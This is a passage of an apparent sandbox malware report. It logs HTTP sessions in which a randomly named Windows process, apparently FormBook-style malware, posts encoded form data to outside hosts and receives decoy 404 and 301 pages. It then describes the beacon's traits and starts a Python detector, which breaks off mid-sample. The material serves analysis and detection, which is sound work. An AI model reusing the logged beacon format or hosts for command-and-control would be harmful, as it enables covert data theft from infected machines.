                                                                                  Data Ascii: GR54yHZ8=hBRTXVZZoqfFRYtlH9DnKSC7J4V9DuX4zONSyVr5Ch6TlweMHF12f8uijPWPcWL4B4NZ1RK1LTuhgngVDMcxm1lYxGqTuWqH4xwGjWrfMf1Xk3U0YaQ/1HKWkJ0EvW/g5/L9E3MqlUbFZ8+edV9LtxbHfOlP4hpEFkAuAWuJnrBpRUyn5JvOP2VNmQ4hz8PLSIVQJKnA9hTUP2zqNBEvghxeHdgWjUl8mHW63CEg+EoXwmG0PCgf7PpTpi3E6etSlUwqwgfO7Rxu2pIYch/vqgqcupb4jrjz4X7Gs6fhhDW274kHKr/fAJW3NGs0zZM4hi4ez3ik1QUV2Uqve0A7ElT5dnpgntr06wrMUogCBI2wloZoAE7fLRGdNcnGRE9xj9ezWwwfmmbHDkTyS2r8wVHCKM8vvasnu2hvNf0gQTdmTQGimPM1VTzbR+PaFtYWwMjHjvIs0Mq274hA1GglbEaSVSAPSilaxy6W54Oy4DZYoTU32WYWEXLEqdwvY96d41sxWr8AX6xhRu9jLpxWj33KeNCQ0dm4BwN+z5z8wZT/wnUd+XDdW7N+ldWr8cxdPG4RVyXldBj/FY3knA0vCl3SYW+cOIpvnuUutTHr3ljYxo/Sl01qTtWs+QKZzbsJn4gGz3eU/DPkYfKNnUKWxfM9TDtjrWGvTFa1dUJkxi6iK+thwP7urjT5mDKMGsdE3o4bjHLIglGXRBTvOW7CuZPsANjalhYSYT/PozyqgSXfExE67kLXeFXclpB+gkYtfn1eIxGmDVDFtPmVh9vhjqILWJIvDUGhHfI7u4ukxCFSJ2KgQugSkU5r5yeLSjSM/5PyUI0W/CL4uzdd9ke/rSOU+3z1XbRj3GCU1jS/LCJ1Mx5UJk24oS6HiDZ9X/Zieb0/vKX2mXmvKRLDfPsryUo6PErChx/TobjliR8w+vOsSVRh8T4DEJ77kih5vCwz+L8wRV5JJjq8cIdoc+PftEHPKIgudoG2HScZraf9m5R [TRUNCATED]
Nov 20, 2024 08:32:10.547473907 CET | 456 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Nov 2024 07:32:10 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.grandesofertas.fun/5rfk/
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49989 | 76.223.74.74 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:12.567233086 CET | 560 | OUT | GET /5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax HTTP/1.1
Host: www.grandesofertas.fun
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:32:13.073115110 CET | 619 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Nov 2024 07:32:12 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW+OptFCrWooNx2zE35RlOZ6Ff5bUgKRp+BgbOlYXfZZMl91myXHSHWgEoZCPkWwn0n+VmG53SX0EAb83CrCeMIkzMnSL4JpBihhagjpE3GksySBz8=&9xn=fHadNpk8MVax
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49990 | 163.44.185.183 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:32:18.568269968 CET | 831 | OUT | POST /21k5/ HTTP/1.1
Host: www.sankan-fukushi.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 213
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.sankan-fukushi.info
Referer: http://www.sankan-fukushi.info/21k5/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Ascii: GR54yHZ8=SUzGnuvHqjrdwPgpBezZGbhCwYMdh+XwJkMZg9n4Ifyo597CK6Ed8gNoRA7ph56OLxFHC7tcF6fGAys7gSswWOvAIA47kxuFpRtdjue0WtaRSjso6UeSWKFsfHjYYl2YeojxwNITV07PNOrc9OsZyYjmENLrwyc30/IuKKHIx33F6ZZpHMP7LlcFK5MJeBeMkl9y490GHgOE
                                                                                  Nov 20, 2024 08:32:19.343815088 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:19 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:19.343837976 CET | 224 | IN | Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center;
                                                                                  Nov 20, 2024 08:32:19.343848944 CET | 1236 | IN | Data Raw: 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61
                                                                                  Data Ascii: -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                                                  Nov 20, 2024 08:32:19.343940973 CET | 1236 | IN | Data Raw: 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72
                                                                                  Data Ascii: : middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:19.343952894 CET | 1236 | IN | Data Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69
                                                                                  Data Ascii: } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media s
                                                                                  Nov 20, 2024 08:32:19.344062090 CET | 1236 | IN | Data Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66
                                                                                  Data Ascii: rg/2000/svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-3
                                                                                  Nov 20, 2024 08:32:19.344161987 CET | 1236 | IN | Data Raw: 2e 35 31 34 2e 33 39 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20
                                                                                  Data Ascii: .514.396 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.5
                                                                                  Nov 20, 2024 08:32:19.344175100 CET | 1236 | IN | Data Raw: 2d 2e 33 37 33 2d 33 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d
                                                                                  Data Ascii: -.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.
                                                                                  Nov 20, 2024 08:32:19.344187021 CET | 1236 | IN | Data Raw: 34 2e 30 39 34 20 31 2e 37 38 2e 30 31 35 20 33 2e 32 2d 31 2e 37 37 36 20 33 2e 32 31 37 2d 34 2e 30 36 34 2e 30 31 37 2d 32 2e 32 38 38 2d 31 2e 33 37 36 2d 34 2e 30 37 39 2d 33 2e 31 37 32 2d 34 2e 30 39 34 7a 6d 32 36 2e 32 2e 31 32 63 2d 31
                                                                                  Data Ascii: 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4.091 3.19 4.091s3.2-1.776 3.217-4.064c.017-2.288-1.391-4.091-3.187-4.091h-.003zm-29.1-2.182c-.701-.023-1.326-.45-1.6
                                                                                  Nov 20, 2024 08:32:19.344199896 CET | 1236 | IN | Data Raw: 2e 31 32 35 2d 36 2e 33 30 36 2d 2e 30 31 36 2d 2e 34 38 31 2e 31 36 2d 2e 39 34 39 2e 34 38 39 2d 31 2e 33 2e 34 39 34 2d 2e 35 33 33 20 31 2e 32 36 34 2d 2e 37 31 20 31 2e 39 34 2d 2e 34 34 35 2e 36 37 37 2e 32 36 35 20 31 2e 31 32 32 2e 39 31
                                                                                  Data Ascii: .125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.03
                                                                                  Nov 20, 2024 08:32:19.348954916 CET | 1236 | IN | Data Raw: 2e 38 30 31 2e 31 32 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 30 32 33 2e 31 32 36 2e 30 35 36 2e 32 35 2e 31 2e 33 37 31 2e 33 31 32 2e 37 34 33 20 31 2e 30 34
                                                                                  Data Ascii: .801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.224 1.846 1.218.805-.006 1.528-.497 1.829-1.244l.061-.2.029-.146c.201-.812-.116-1.664-.8-2.146-.332-.231-.727-.355-1.131-.354h-.001zm0-9.692c-.405-.001-.801.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  6 | 192.168.2.6 | 49991 | 163.44.185.183 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:32:21.122011900 CET | 855 | OUT | POST /21k5/ HTTP/1.1
                                                                                  Host: www.sankan-fukushi.info
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sankan-fukushi.info
                                                                                  Referer: http://www.sankan-fukushi.info/21k5/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 6d 6f 35 63 4c 43 4c 37 45 64 2f 67 4e 6f 61 67 37 73 72 5a 36 51 4c 78 4a 70 43 36 52 63 46 36 4c 47 41 33 51 37 68 68 55 2f 58 65 76 34 41 67 34 6c 71 52 75 46 70 52 74 64 6a 75 4b 4b 57 75 71 52 53 79 63 6f 36 31 65 52 63 71 46 76 50 33 6a 59 63 6c 32 63 65 6f 6a 48 77 4d 55 39 56 32 44 50 4e 4f 62 63 38 61 34 65 39 59 6a 67 5a 39 4c 31 35 77 49 79 77 4f 35 57 44 4c 50 66 6e 32 7a 55 2f 76 45 7a 62 2f 50 59 5a 31 38 48 4b 37 55 37 65 68 65 6d 6d 6c 46 79 71 71 34 68 49 55 72 6e 34 65 49 37 70 5a 72 53 33 68 70 7a 76 64 65 4b 79 54 4d 73 4b 67 3d 3d
                                                                                  Data Ascii: GR54yHZ8=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18HK7U7ehemmlFyqq4hIUrn4eI7pZrS3hpzvdeKyTMsKg==
                                                                                  Nov 20, 2024 08:32:21.919670105 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:32:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 19268
                                                                                  Connection: close
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                  Nov 20, 2024 08:32:21.919878006 CET | 224 | IN | Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                  Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center;
                                                                                  Nov 20, 2024 08:32:21.919886112 CET | 1236 | IN | Data Raw: 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61
                                                                                  Data Ascii: -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                                                  Nov 20, 2024 08:32:21.919893026 CET | 1236 | IN | Data Raw: 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72
                                                                                  Data Ascii: : middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1;
                                                                                  Nov 20, 2024 08:32:21.919899940 CET | 1236 | IN | Data Raw: 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69
                                                                                  Data Ascii: } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media s
                                                                                  Nov 20, 2024 08:32:21.919914961 CET | 1236 | IN | Data Raw: 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66
                                                                                  Data Ascii: rg/2000/svg" width="100" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-3
                                                                                  Nov 20, 2024 08:32:21.919928074 CET | 1236 | IN | Data Raw: 2e 35 31 34 2e 33 39 36 20 31 2e 31 35 33 2e 35 39 34 20 31 2e 38 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20
                                                                                  Data Ascii: .514.396 1.153.594 1.8.557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.5
                                                                                  Nov 20, 2024 08:32:21.920092106 CET | 552 | IN | Data Raw: 2d 2e 33 37 33 2d 33 2e 36 32 31 2d 31 2e 36 37 31 2d 2e 38 32 34 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d
                                                                                  Data Ascii: -.373-3.621-1.671-.824-1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.
                                                                                  Nov 20, 2024 08:32:21.921544075 CET | 1236 | IN | Data Raw: 37 2d 2e 33 20 32 2e 39 33 35 2d 2e 32 38 32 20 31 2e 35 38 39 2d 2e 33 34 38 20 33 2e 32 30 39 2d 2e 31 39 35 20 34 2e 38 31 36 2d 33 2e 37 33 20 31 31 2e 32 32 37 2d 31 32 2e 35 37 34 20 31 39 2e 33 38 34 2d 32 32 2e 35 35 35 20 31 39 2e 33 38
                                                                                  Data Ascii: 7-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.00
                                                                                  Nov 20, 2024 08:32:21.921623945 CET | 1236 | IN | Data Raw: 35 31 2d 31 2e 39 36 2e 39 35 39 2d 32 2e 33 34 39 20 32 2e 36 35 33 2d 31 2e 31 32 33 20 35 2e 37 31 39 2d 2e 35 38 31 20 37 2e 38 32 36 20 31 2e 33 38 35 2e 34 36 38 2e 35 32 33 2e 35 39 20 31 2e 32 37 2e 33 31 34 20 31 2e 39 31 35 2d 2e 32 37
                                                                                  Data Ascii: 51-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.
                                                                                  Nov 20, 2024 08:32:21.924953938 CET | 1236 | IN | Data Raw: 2d 31 2e 31 2d 31 2e 32 38 36 6c 2d 2e 33 37 32 2d 2e 34 34 38 2d 2e 31 31 31 2d 2e 31 34 37 63 2d 2e 33 34 33 2d 2e 34 35 39 2d 2e 37 2d 2e 39 33 34 2d 31 2e 30 33 37 2d 31 2e 34 33 33 6c 2d 2e 31 35 38 2d 2e 32 33 38 63 2d 2e 33 37 32 2d 2e 35
                                                                                  Data Ascii: -1.1-1.286l-.372-.448-.111-.147c-.343-.459-.7-.934-1.037-1.433l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271
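Every session in this part of the report has the same shape: a POST to /21k5/ on www.sankan-fukushi.info carrying one form field (GR54yHZ8) whose value is base64-looking text, a Referer equal to Origin plus the request path although no page was ever fetched, a legacy MSIE 7.0 User-Agent, Connection: close, a 404 from a decoy host, and a sending process with a random-looking name under C:\Program Files (x86). The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses session blocks written in the report's own row layout and scores those traits per session. The SAMPLE text is constructed from session 6 above; the benign Chrome control session, the 203.0.113.10 address, the session ID 8 and the four-of-six threshold are assumptions made for the example.

```python
# Added example, not from the Joe Sandbox report: parse sandbox HTTP
# session blocks and flag the FormBook-style POST beacon seen above.
# SAMPLE is constructed: the first session copies session 6 of the
# report (hex dump omitted); the Chrome session, its address and
# PID are invented as a benign control. The scoring rules and the
# threshold are the example author's, not something the report states.
import re
from dataclasses import dataclass, field

SAMPLE = r"""
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
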